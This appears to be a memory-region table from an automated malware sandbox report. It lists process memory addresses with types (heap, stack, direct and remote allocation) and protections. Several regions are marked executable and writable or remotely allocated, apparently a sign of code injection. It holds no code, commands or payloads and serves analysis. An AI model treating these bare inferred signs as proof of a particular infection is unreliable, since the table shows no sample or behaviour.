||
|
23470000
|
direct allocation
|
page read and write
|
||
|
7FFD9A290000
|
trusted library allocation
|
page read and write
|
||
|
70A0000
|
direct allocation
|
page read and write
|
||
|
238FE000
|
stack
|
page read and write
|
||
|
300F000
|
stack
|
page read and write
|
||
|
4A50000
|
trusted library allocation
|
page read and write
|
||
|
1CB9A11D000
|
heap
|
page read and write
|
||
|
2C10000
|
heap
|
page read and write
|
||
|
221C112A000
|
heap
|
page read and write
|
||
|
7CF6A7F000
|
stack
|
page read and write
|
||
|
78F0000
|
trusted library allocation
|
page read and write
|
||
|
78E0000
|
trusted library allocation
|
page read and write
|
||
|
7090000
|
direct allocation
|
page read and write
|
||
|
1CB9A2F0000
|
heap
|
page execute and read and write
|
||
|
27F0000
|
heap
|
page read and write
|
||
|
7CF6F79000
|
stack
|
page read and write
|
||
|
4D58FFF000
|
stack
|
page read and write
|
||
|
221C1220000
|
heap
|
page read and write
|
||
|
221C2F41000
|
heap
|
page read and write
|
||
|
221C2F39000
|
heap
|
page read and write
|
||
|
2E7E000
|
stack
|
page read and write
|
||
|
70E0000
|
direct allocation
|
page read and write
|
||
|
4D58AF9000
|
stack
|
page read and write
|
||
|
221C114B000
|
heap
|
page read and write
|
||
|
221C30D7000
|
heap
|
page read and write
|
||
|
234FE000
|
stack
|
page read and write
|
||
|
1CB9C5FC000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9A054000
|
trusted library allocation
|
page read and write
|
||
|
9CF7000
|
trusted library allocation
|
page read and write
|
||
|
1CBB41F9000
|
heap
|
page read and write
|
||
|
221C30D3000
|
heap
|
page read and write
|
||
|
3044000
|
trusted library allocation
|
page read and write
|
||
|
7750000
|
heap
|
page execute and read and write
|
||
|
1CB9A040000
|
trusted library allocation
|
page read and write
|
||
|
301F000
|
stack
|
page read and write
|
||
|
74EE000
|
stack
|
page read and write
|
||
|
221C2F17000
|
heap
|
page read and write
|
||
|
77F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
221C2F1A000
|
heap
|
page read and write
|
||
|
878C000
|
stack
|
page read and write
|
||
|
8350000
|
trusted library allocation
|
page execute and read and write
|
||
|
235F0000
|
remote allocation
|
page read and write
|
||
|
221C114B000
|
heap
|
page read and write
|
||
|
221C310D000
|
heap
|
page read and write
|
||
|
7FFD9A232000
|
trusted library allocation
|
page read and write
|
||
|
23528EA0000
|
heap
|
page read and write
|
||
|
221C2F3E000
|
heap
|
page read and write
|
||
|
8500000
|
trusted library allocation
|
page read and write
|
||
|
30AC000
|
heap
|
page read and write
|
||
|
A50000
|
heap
|
page read and write
|
||
|
1CB9A310000
|
heap
|
page read and write
|
||
|
4D590FF000
|
stack
|
page read and write
|
||
|
7FFD9A3E0000
|
trusted library allocation
|
page read and write
|
||
|
221C1338000
|
heap
|
page read and write
|
||
|
7D70000
|
direct allocation
|
page read and write
|
||
|
221C30F3000
|
heap
|
page read and write
|
||
|
1CBABF70000
|
trusted library allocation
|
page read and write
|
||
|
221C2F17000
|
heap
|
page read and write
|
||
|
3370000
|
heap
|
page read and write
|
||
|
1CBABCA1000
|
trusted library allocation
|
page read and write
|
||
|
3059000
|
trusted library allocation
|
page read and write
|
||
|
7890000
|
trusted library allocation
|
page read and write
|
||
|
8450000
|
trusted library allocation
|
page read and write
|
||
|
7960000
|
trusted library allocation
|
page read and write
|
||
|
4BDE000
|
stack
|
page read and write
|
||
|
2D7E000
|
stack
|
page read and write
|
||
|
7CF67FF000
|
stack
|
page read and write
|
||
|
1CB9A2C0000
|
heap
|
page execute and read and write
|
||
|
1CBB409C000
|
heap
|
page read and write
|
||
|
7FFD9A053000
|
trusted library allocation
|
page execute and read and write
|
||
|
221C2F18000
|
heap
|
page read and write
|
||
|
1CB9C7DE000
|
trusted library allocation
|
page read and write
|
||
|
2366F000
|
stack
|
page read and write
|
||
|
221C3093000
|
heap
|
page read and write
|
||
|
7FFD9A110000
|
trusted library allocation
|
page execute and read and write
|
||
|
70B0000
|
direct allocation
|
page read and write
|
||
|
7FFD9A220000
|
trusted library allocation
|
page execute and read and write
|
||
|
8A00000
|
direct allocation
|
page read and write
|
||
|
74AE000
|
stack
|
page read and write
|
||
|
7C40000
|
direct allocation
|
page read and write
|
||
|
221C30DD000
|
heap
|
page read and write
|
||
|
313D000
|
heap
|
page read and write
|
||
|
BA7D000
|
direct allocation
|
page execute and read and write
|
||
|
278D000
|
stack
|
page read and write
|
||
|
238BD000
|
stack
|
page read and write
|
||
|
7FFD9A2C0000
|
trusted library allocation
|
page read and write
|
||
|
23070000
|
heap
|
page read and write
|
||
|
230ED000
|
stack
|
page read and write
|
||
|
1CBB4089000
|
heap
|
page read and write
|
||
|
7900000
|
trusted library allocation
|
page read and write
|
||
|
7DC0000
|
direct allocation
|
page read and write
|
||
|
2362E000
|
stack
|
page read and write
|
||
|
7CF6DFE000
|
stack
|
page read and write
|
||
|
221C1190000
|
heap
|
page read and write
|
||
|
3070000
|
trusted library allocation
|
page read and write
|
||
|
8440000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9A3B0000
|
trusted library allocation
|
page read and write
|
||
|
77C91FE000
|
unkown
|
page read and write
|
||
|
3075000
|
trusted library allocation
|
page execute and read and write
|
||
|
7C60000
|
heap
|
page read and write
|
||
|
87ED000
|
heap
|
page read and write
|
||
|
8520000
|
trusted library allocation
|
page read and write
|
||
|
7640000
|
heap
|
page read and write
|
||
|
30DF000
|
heap
|
page read and write
|
||
|
7E30000
|
direct allocation
|
page read and write
|
||
|
7FFD9A310000
|
trusted library allocation
|
page read and write
|
||
|
3198000
|
heap
|
page read and write
|
||
|
221C308E000
|
heap
|
page read and write
|
||
|
7330000
|
heap
|
page read and write
|
||
|
7FFD9A10C000
|
trusted library allocation
|
page execute and read and write
|
||
|
221C3095000
|
heap
|
page read and write
|
||
|
221C2F11000
|
heap
|
page read and write
|
||
|
1CBB4288000
|
heap
|
page read and write
|
||
|
7CF707E000
|
stack
|
page read and write
|
||
|
1CB9BD05000
|
trusted library allocation
|
page read and write
|
||
|
1CB9C0FE000
|
trusted library allocation
|
page read and write
|
||
|
7CF1000
|
heap
|
page read and write
|
||
|
7551000
|
heap
|
page read and write
|
||
|
3030000
|
trusted library allocation
|
page read and write
|
||
|
1CB9A0A6000
|
heap
|
page read and write
|
||
|
3110000
|
heap
|
page read and write
|
||
|
1CBB4218000
|
heap
|
page read and write
|
||
|
4B4E000
|
stack
|
page read and write
|
||
|
234BD000
|
stack
|
page read and write
|
||
|
1CB9DA51000
|
trusted library allocation
|
page read and write
|
||
|
78B0000
|
trusted library allocation
|
page read and write
|
||
|
3110000
|
heap
|
page read and write
|
||
|
2356E000
|
stack
|
page read and write
|
||
|
7FFD9A260000
|
trusted library allocation
|
page read and write
|
||
|
89D0000
|
trusted library allocation
|
page read and write
|
||
|
4D594FB000
|
stack
|
page read and write
|
||
|
7CF6B7E000
|
stack
|
page read and write
|
||
|
3060000
|
trusted library allocation
|
page read and write
|
||
|
4D9B000
|
trusted library allocation
|
page read and write
|
||
|
221C1200000
|
heap
|
page read and write
|
||
|
87E5000
|
heap
|
page read and write
|
||
|
4AAE000
|
stack
|
page read and write
|
||
|
236BD000
|
stack
|
page read and write
|
||
|
4B9E000
|
stack
|
page read and write
|
||
|
221C11EE000
|
heap
|
page read and write
|
||
|
1CBABC81000
|
trusted library allocation
|
page read and write
|
||
|
7CF67B3000
|
stack
|
page read and write
|
||
|
7FFD9A235000
|
trusted library allocation
|
page read and write
|
||
|
4C5E000
|
stack
|
page read and write
|
||
|
4CED000
|
stack
|
page read and write
|
||
|
336E000
|
stack
|
page read and write
|
||
|
221C3099000
|
heap
|
page read and write
|
||
|
7F520000
|
trusted library allocation
|
page execute and read and write
|
||
|
5D69000
|
trusted library allocation
|
page read and write
|
||
|
221C1100000
|
heap
|
page read and write
|
||
|
221C2F1F000
|
heap
|
page read and write
|
||
|
221C2F1F000
|
heap
|
page read and write
|
||
|
70D0000
|
direct allocation
|
page read and write
|
||
|
4D58CFE000
|
stack
|
page read and write
|
||
|
7FFD9A280000
|
trusted library allocation
|
page read and write
|
||
|
221C1190000
|
heap
|
page read and write
|
||
|
788D000
|
stack
|
page read and write
|
||
|
2335E000
|
stack
|
page read and write
|
||
|
221C30D3000
|
heap
|
page read and write
|
||
|
221C2F2E000
|
heap
|
page read and write
|
||
|
7668000
|
heap
|
page read and write
|
||
|
1CBABC8F000
|
trusted library allocation
|
page read and write
|
||
|
4B05000
|
heap
|
page execute and read and write
|
||
|
221C11F2000
|
heap
|
page read and write
|
||
|
221C30BE000
|
heap
|
page read and write
|
||
|
23450000
|
direct allocation
|
page read and write
|
||
|
221C30E6000
|
heap
|
page read and write
|
||
|
7DD0000
|
direct allocation
|
page read and write
|
||
|
221C30E6000
|
heap
|
page read and write
|
||
|
1CB9A070000
|
trusted library allocation
|
page read and write
|
||
|
8510000
|
trusted library allocation
|
page read and write
|
||
|
221C30AF000
|
heap
|
page read and write
|
||
|
221C308F000
|
heap
|
page read and write
|
||
|
7674000
|
heap
|
page read and write
|
||
|
2E20000
|
heap
|
page read and write
|
||
|
7CF6D7E000
|
stack
|
page read and write
|
||
|
7FFD9A2B0000
|
trusted library allocation
|
page read and write
|
||
|
7691000
|
heap
|
page read and write
|
||
|
78D0000
|
trusted library allocation
|
page read and write
|
||
|
221C2F11000
|
heap
|
page read and write
|
||
|
2DC0000
|
heap
|
page read and write
|
||
|
1CB9BAC1000
|
heap
|
page read and write
|
||
|
3020000
|
trusted library section
|
page read and write
|
||
|
221C1192000
|
heap
|
page read and write
|
||
|
77C917A000
|
stack
|
page read and write
|
||
|
221C2F18000
|
heap
|
page read and write
|
||
|
6B5D000
|
remote allocation
|
page execute and read and write
|
||
|
2EB8000
|
heap
|
page read and write
|
||
|
49D0000
|
heap
|
page readonly
|
||
|
235F0000
|
remote allocation
|
page read and write
|
||
|
87F5000
|
heap
|
page read and write
|
||
|
84E0000
|
trusted library allocation
|
page read and write
|
||
|
2FC0000
|
heap
|
page read and write
|
||
|
3090000
|
trusted library allocation
|
page read and write
|
||
|
70F0000
|
direct allocation
|
page read and write
|
||
|
4D58BFE000
|
stack
|
page read and write
|
||
|
221C2F1D000
|
heap
|
page read and write
|
||
|
221C1130000
|
heap
|
page read and write
|
||
|
221C1338000
|
heap
|
page read and write
|
||
|
4B58000
|
heap
|
page read and write
|
||
|
1CB9A0D1000
|
heap
|
page read and write
|
||
|
221C30B3000
|
heap
|
page read and write
|
||
|
236FC000
|
stack
|
page read and write
|
||
|
1CBB4017000
|
heap
|
page read and write
|
||
|
221C2F10000
|
heap
|
page read and write
|
||
|
615D000
|
remote allocation
|
page execute and read and write
|
||
|
1CB9A0D8000
|
heap
|
page read and write
|
||
|
1CB9DA35000
|
trusted library allocation
|
page read and write
|
||
|
2C30000
|
heap
|
page read and write
|
||
|
84DC000
|
stack
|
page read and write
|
||
|
8530000
|
trusted library allocation
|
page read and write
|
||
|
7080000
|
direct allocation
|
page read and write
|
||
|
7CF727B000
|
stack
|
page read and write
|
||
|
5D51000
|
trusted library allocation
|
page read and write
|
||
|
1CB9DA00000
|
trusted library allocation
|
page read and write
|
||
|
86BC000
|
stack
|
page read and write
|
||
|
7FFD9A3C0000
|
trusted library allocation
|
page read and write
|
||
|
3050000
|
trusted library allocation
|
page read and write
|
||
|
1CB9A000000
|
heap
|
page read and write
|
||
|
1CB9A315000
|
heap
|
page read and write
|
||
|
7DA0000
|
direct allocation
|
page read and write
|
||
|
7320000
|
heap
|
page read and write
|
||
|
4AFE000
|
stack
|
page read and write
|
||
|
7FFD9A3A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9A380000
|
trusted library allocation
|
page read and write
|
||
|
221C2F15000
|
heap
|
page read and write
|
||
|
221C114B000
|
heap
|
page read and write
|
||
|
7CE5000
|
heap
|
page read and write
|
||
|
2E90000
|
heap
|
page read and write
|
||
|
221C2F5D000
|
heap
|
page read and write
|
||
|
87A0000
|
trusted library allocation
|
page read and write
|
||
|
83DD000
|
stack
|
page read and write
|
||
|
1CBABF7E000
|
trusted library allocation
|
page read and write
|
||
|
23528B98000
|
heap
|
page read and write
|
||
|
7FFD9A2F0000
|
trusted library allocation
|
page read and write
|
||
|
221C3106000
|
heap
|
page read and write
|
||
|
221C30AD000
|
heap
|
page read and write
|
||
|
221C30E6000
|
heap
|
page read and write
|
||
|
221C2F41000
|
heap
|
page read and write
|
||
|
235AE000
|
stack
|
page read and write
|
||
|
1CB9DB1D000
|
trusted library allocation
|
page read and write
|
||
|
7CF6E78000
|
stack
|
page read and write
|
||
|
221C30F5000
|
heap
|
page read and write
|
||
|
221C30B3000
|
heap
|
page read and write
|
||
|
8430000
|
heap
|
page read and write
|
||
|
8A60000
|
direct allocation
|
page read and write
|
||
|
7C50000
|
direct allocation
|
page read and write
|
||
|
221C2F14000
|
heap
|
page read and write
|
||
|
23460000
|
direct allocation
|
page read and write
|
||
|
23528EA5000
|
heap
|
page read and write
|
||
|
79AB000
|
stack
|
page read and write
|
||
|
2339F000
|
stack
|
page read and write
|
||
|
3119000
|
heap
|
page read and write
|
||
|
221C3090000
|
heap
|
page read and write
|
||
|
30D3000
|
heap
|
page read and write
|
||
|
7930000
|
trusted library allocation
|
page read and write
|
||
|
4260000
|
remote allocation
|
page execute and read and write
|
||
|
221C2F41000
|
heap
|
page read and write
|
||
|
221C1338000
|
heap
|
page read and write
|
||
|
8A30000
|
direct allocation
|
page read and write
|
||
|
1CBB40E0000
|
heap
|
page read and write
|
||
|
1CB9D2C5000
|
trusted library allocation
|
page read and write
|
||
|
3141000
|
heap
|
page read and write
|
||
|
221C1190000
|
heap
|
page read and write
|
||
|
1CBB41C0000
|
heap
|
page read and write
|
||
|
7649000
|
heap
|
page read and write
|
||
|
1CB9BEA6000
|
trusted library allocation
|
page read and write
|
||
|
2DA0000
|
heap
|
page read and write
|
||
|
771B000
|
heap
|
page read and write
|
||
|
2B00000
|
heap
|
page read and write
|
||
|
755D000
|
remote allocation
|
page execute and read and write
|
||
|
2EB0000
|
heap
|
page read and write
|
||
|
7FFD9A1F0000
|
trusted library allocation
|
page read and write
|
||
|
221C308C000
|
heap
|
page read and write
|
||
|
7FFD9A270000
|
trusted library allocation
|
page read and write
|
||
|
221C11F2000
|
heap
|
page read and write
|
||
|
77E0000
|
trusted library allocation
|
page read and write
|
||
|
221C1338000
|
heap
|
page read and write
|
||
|
8360000
|
trusted library allocation
|
page read and write
|
||
|
2387E000
|
stack
|
page read and write
|
||
|
221C2F41000
|
heap
|
page read and write
|
||
|
A4E000
|
stack
|
page read and write
|
||
|
4D591FE000
|
stack
|
page read and write
|
||
|
7CFD000
|
heap
|
page read and write
|
||
|
221C2F13000
|
heap
|
page read and write
|
||
|
87C0000
|
trusted library allocation
|
page read and write
|
||
|
784E000
|
stack
|
page read and write
|
||
|
1CBB3FC9000
|
heap
|
page read and write
|
||
|
7FFD9A136000
|
trusted library allocation
|
page execute and read and write
|
||
|
221C30B3000
|
heap
|
page read and write
|
||
|
1CB9A057000
|
heap
|
page read and write
|
||
|
89F0000
|
trusted library allocation
|
page read and write
|
||
|
4A60000
|
heap
|
page execute and read and write
|
||
|
7CF7D4D000
|
stack
|
page read and write
|
||
|
9C7D000
|
direct allocation
|
page execute and read and write
|
||
|
3043000
|
trusted library allocation
|
page execute and read and write
|
||
|
23528B90000
|
heap
|
page read and write
|
||
|
7715000
|
heap
|
page read and write
|
||
|
2B4C000
|
stack
|
page read and write
|
||
|
4A3C000
|
stack
|
page read and write
|
||
|
7CF71FE000
|
stack
|
page read and write
|
||
|
337C000
|
heap
|
page read and write
|
||
|
1CBB4269000
|
heap
|
page read and write
|
||
|
221C2F22000
|
heap
|
page read and write
|
||
|
8337000
|
stack
|
page read and write
|
||
|
7CF7C4E000
|
stack
|
page read and write
|
||
|
7CF7DCB000
|
stack
|
page read and write
|
||
|
49E8000
|
trusted library allocation
|
page read and write
|
||
|
769A000
|
heap
|
page read and write
|
||
|
4D30000
|
heap
|
page read and write
|
||
|
3050000
|
heap
|
page read and write
|
||
|
221C30C5000
|
heap
|
page read and write
|
||
|
221C117B000
|
heap
|
page read and write
|
||
|
8340000
|
heap
|
page read and write
|
||
|
221C2F12000
|
heap
|
page read and write
|
||
|
221C30DD000
|
heap
|
page read and write
|
||
|
221C1335000
|
heap
|
page read and write
|
||
|
221C30B3000
|
heap
|
page read and write
|
||
|
1CB9A2C7000
|
heap
|
page execute and read and write
|
||
|
7910000
|
trusted library allocation
|
page read and write
|
||
|
C47D000
|
direct allocation
|
page execute and read and write
|
||
|
1CB9A0D4000
|
heap
|
page read and write
|
||
|
221C11EE000
|
heap
|
page read and write
|
||
|
7940000
|
trusted library allocation
|
page read and write
|
||
|
1CB9A11F000
|
heap
|
page read and write
|
||
|
7CF6BFE000
|
stack
|
page read and write
|
||
|
221C113B000
|
heap
|
page read and write
|
||
|
1CB9C115000
|
trusted library allocation
|
page read and write
|
||
|
221C11EE000
|
heap
|
page read and write
|
||
|
2E44000
|
heap
|
page read and write
|
||
|
78C0000
|
trusted library allocation
|
page read and write
|
||
|
7659000
|
heap
|
page read and write
|
||
|
221C1330000
|
heap
|
page read and write
|
||
|
221C30D9000
|
heap
|
page read and write
|
||
|
7CF6C7C000
|
stack
|
page read and write
|
||
|
7CF4000
|
heap
|
page read and write
|
||
|
1CB9C383000
|
trusted library allocation
|
page read and write
|
||
|
304D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CB9A0F4000
|
heap
|
page read and write
|
||
|
23500000
|
heap
|
page read and write
|
||
|
725D000
|
stack
|
page read and write
|
||
|
221C3099000
|
heap
|
page read and write
|
||
|
4D2B000
|
stack
|
page read and write
|
||
|
1CB9D9FB000
|
trusted library allocation
|
page read and write
|
||
|
1CBB4015000
|
heap
|
page read and write
|
||
|
7FFD9A237000
|
trusted library allocation
|
page read and write
|
||
|
575D000
|
remote allocation
|
page execute and read and write
|
||
|
1CB9C7F3000
|
trusted library allocation
|
page read and write
|
||
|
221C30B3000
|
heap
|
page read and write
|
||
|
7CF6EF7000
|
stack
|
page read and write
|
||
|
7CF7E4B000
|
stack
|
page read and write
|
||
|
1CB9A0E0000
|
heap
|
page read and write
|
||
|
22D10000
|
direct allocation
|
page read and write
|
||
|
7FFD9A370000
|
trusted library allocation
|
page read and write
|
||
|
221C2F18000
|
heap
|
page read and write
|
||
|
7920000
|
trusted library allocation
|
page read and write
|
||
|
77DE000
|
stack
|
page read and write
|
||
|
7FFD9A06B000
|
trusted library allocation
|
page read and write
|
||
|
2FCE000
|
stack
|
page read and write
|
||
|
7D36000
|
heap
|
page read and write
|
||
|
746E000
|
stack
|
page read and write
|
||
|
86FB000
|
stack
|
page read and write
|
||
|
70C0000
|
direct allocation
|
page read and write
|
||
|
1CB9BC81000
|
trusted library allocation
|
page read and write
|
||
|
221C112B000
|
heap
|
page read and write
|
||
|
221C2F41000
|
heap
|
page read and write
|
||
|
4D592FD000
|
stack
|
page read and write
|
||
|
2D3F000
|
unkown
|
page read and write
|
||
|
87F9000
|
heap
|
page read and write
|
||
|
71BE000
|
stack
|
page read and write
|
||
|
221C1159000
|
heap
|
page read and write
|
||
|
851B000
|
trusted library allocation
|
page read and write
|
||
|
4B50000
|
heap
|
page read and write
|
||
|
2312C000
|
stack
|
page read and write
|
||
|
221C2F17000
|
heap
|
page read and write
|
||
|
7BB5000
|
heap
|
page read and write
|
||
|
84F0000
|
heap
|
page read and write
|
||
|
7BB0000
|
heap
|
page read and write
|
||
|
1CBB424F000
|
heap
|
page read and write
|
||
|
221C116E000
|
heap
|
page read and write
|
||
|
7310000
|
heap
|
page read and write
|
||
|
7729000
|
heap
|
page read and write
|
||
|
752E000
|
stack
|
page read and write
|
||
|
221C1192000
|
heap
|
page read and write
|
||
|
7FFD9A100000
|
trusted library allocation
|
page read and write
|
||
|
841E000
|
stack
|
page read and write
|
||
|
2331E000
|
stack
|
page read and write
|
||
|
A67D000
|
direct allocation
|
page execute and read and write
|
||
|
7CF7CCE000
|
stack
|
page read and write
|
||
|
7FFD9A170000
|
trusted library allocation
|
page execute and read and write
|
||
|
2322E000
|
stack
|
page read and write
|
||
|
7E10000
|
direct allocation
|
page read and write
|
||
|
221C2F26000
|
heap
|
page read and write
|
||
|
4A40000
|
trusted library allocation
|
page execute and read and write
|
||
|
71FD000
|
stack
|
page read and write
|
||
|
306A000
|
trusted library allocation
|
page execute and read and write
|
||
|
729A000
|
stack
|
page read and write
|
||
|
7D00000
|
heap
|
page read and write
|
||
|
221C3010000
|
heap
|
page read and write
|
||
|
4D58EFF000
|
stack
|
page read and write
|
||
|
B07D000
|
direct allocation
|
page execute and read and write
|
||
|
23910000
|
heap
|
page read and write
|
||
|
1CB9A090000
|
heap
|
page read and write
|
||
|
2E44000
|
heap
|
page read and write
|
||
|
30A0000
|
heap
|
page read and write
|
||
|
1CB9A09D000
|
heap
|
page read and write
|
||
|
7FFD9A320000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9A340000
|
trusted library allocation
|
page read and write
|
||
|
7E20000
|
direct allocation
|
page read and write
|
||
|
7FFD9A20A000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9A300000
|
trusted library allocation
|
page read and write
|
||
|
2BE0000
|
heap
|
page read and write
|
||
|
8655000
|
trusted library allocation
|
page read and write
|
||
|
2CFA000
|
stack
|
page read and write
|
||
|
1CB9DA20000
|
trusted library allocation
|
page read and write
|
||
|
2BD0000
|
heap
|
page read and write
|
||
|
221C30A6000
|
heap
|
page read and write
|
||
|
7DE0000
|
direct allocation
|
page read and write
|
||
|
221C2F16000
|
heap
|
page read and write
|
||
|
7FFD9A250000
|
trusted library allocation
|
page read and write
|
||
|
221C2F18000
|
heap
|
page read and write
|
||
|
1CB99FC0000
|
heap
|
page read and write
|
||
|
2EB5000
|
heap
|
page read and write
|
||
|
8570000
|
trusted library allocation
|
page read and write
|
||
|
99D000
|
stack
|
page read and write
|
||
|
221C32C1000
|
heap
|
page read and write
|
||
|
221C1130000
|
heap
|
page read and write
|
||
|
87B0000
|
trusted library allocation
|
page read and write
|
||
|
1CB9BC70000
|
heap
|
page read and write
|
||
|
7FFD9A050000
|
trusted library allocation
|
page read and write
|
||
|
7C6A000
|
heap
|
page read and write
|
||
|
1CB9DA24000
|
trusted library allocation
|
page read and write
|
||
|
221C30FE000
|
heap
|
page read and write
|
||
|
7DF0000
|
direct allocation
|
page read and write
|
||
|
1CB9A1A0000
|
trusted library allocation
|
page read and write
|
||
|
3072000
|
trusted library allocation
|
page read and write
|
||
|
3175000
|
heap
|
page read and write
|
||
|
779E000
|
stack
|
page read and write
|
||
|
87D0000
|
heap
|
page read and write
|
||
|
221C1190000
|
heap
|
page read and write
|
||
|
23528B50000
|
heap
|
page read and write
|
||
|
221C11C8000
|
heap
|
page read and write
|
||
|
5D4B000
|
trusted library allocation
|
page read and write
|
||
|
4B00000
|
heap
|
page execute and read and write
|
||
|
7D60000
|
direct allocation
|
page read and write
|
||
|
8420000
|
trusted library allocation
|
page execute and read and write
|
||
|
7CF6CFF000
|
stack
|
page read and write
|
||
|
1CB9D21E000
|
trusted library allocation
|
page read and write
|
||
|
221C310E000
|
heap
|
page read and write
|
||
|
4E98000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9A360000
|
trusted library allocation
|
page read and write
|
||
|
221C113E000
|
heap
|
page read and write
|
||
|
3040000
|
trusted library allocation
|
page read and write
|
||
|
221C2F5D000
|
heap
|
page read and write
|
||
|
221C30E6000
|
heap
|
page read and write
|
||
|
221C2F41000
|
heap
|
page read and write
|
||
|
221C2F32000
|
heap
|
page read and write
|
||
|
221C2F29000
|
heap
|
page read and write
|
||
|
221C308D000
|
heap
|
page read and write
|
||
|
7312000
|
heap
|
page read and write
|
||
|
77C947F000
|
stack
|
page read and write
|
||
|
8790000
|
trusted library allocation
|
page execute and read and write
|
||
|
221C1192000
|
heap
|
page read and write
|
||
|
221C30E1000
|
heap
|
page read and write
|
||
|
221C2F41000
|
heap
|
page read and write
|
||
|
221C112F000
|
heap
|
page read and write
|
||
|
221C30DD000
|
heap
|
page read and write
|
||
|
7FFD9A2D0000
|
trusted library allocation
|
page read and write
|
||
|
221C308E000
|
heap
|
page read and write
|
||
|
1CB9C3DC000
|
trusted library allocation
|
page read and write
|
||
|
1CB9A050000
|
heap
|
page read and write
|
||
|
23528B20000
|
heap
|
page read and write
|
||
|
7FFD9A2A0000
|
trusted library allocation
|
page read and write
|
||
|
23440000
|
direct allocation
|
page read and write
|
||
|
7CF6FF9000
|
stack
|
page read and write
|
||
|
1CB9C18B000
|
trusted library allocation
|
page read and write
|
||
|
7662000
|
heap
|
page read and write
|
||
|
221C30A0000
|
heap
|
page read and write
|
||
|
1CB9C2E1000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9A390000
|
trusted library allocation
|
page read and write
|
||
|
713E000
|
stack
|
page read and write
|
||
|
235F0000
|
remote allocation
|
page read and write
|
||
|
7CF717E000
|
stack
|
page read and write
|
||
|
221C2F17000
|
heap
|
page read and write
|
||
|
435D000
|
remote allocation
|
page execute and read and write
|
||
|
8823000
|
heap
|
page read and write
|
||
|
2373D000
|
stack
|
page read and write
|
||
|
2D39000
|
stack
|
page read and write
|
||
|
1CB9A080000
|
heap
|
page execute and read and write
|
||
|
2E43000
|
heap
|
page read and write
|
||
|
2AFD000
|
stack
|
page read and write
|
There are 588 hidden memdumps, click here to show them.